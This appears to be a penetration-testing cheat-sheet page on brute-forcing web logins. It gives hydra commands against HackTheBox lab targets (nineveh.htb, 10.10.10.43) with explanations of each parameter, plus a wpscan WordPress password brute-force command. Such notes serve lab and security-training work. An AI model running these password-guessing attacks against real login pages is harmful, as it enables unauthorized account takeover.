Brute-Force

Web Login Form

# http
└─$ hydra -l 'admin' -P /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10k-most-common.txt nineveh.htb http-post-form '/department/login.php:username=^USER^&password=^PASS^&Login=Login:Invalid Password!'

  • -P: specifies the file that contains the passwords.

  • http-post-form: specifies an HTTP POST request.

  • “….”: the content in the double quotes specifies the username/password parameters to be tested and the failed login message.

# https
└─$ hydra -l admin -P /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10k-most-common.txt 10.10.10.43 https-post-form '/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect'

  • -l admin (Must specify even no username parameter)

  • -P [password list] list of password to bruteforce

  • 10.10.10.43 specify IP or hostname

  • https-post-form type of request for port 443

  • /db/index.php path to POST the data

  • :password=^PASS^&remember=yes&login=Log+In&proc_login=true data on POST

  • :Incorrect text on the response that dedicate login failed

BruteForce WordPress

wpscan --url $URL --disable-tls-checks -U Users -P cewl.txt
PreviousWordlistNextCrack Hash

Last updated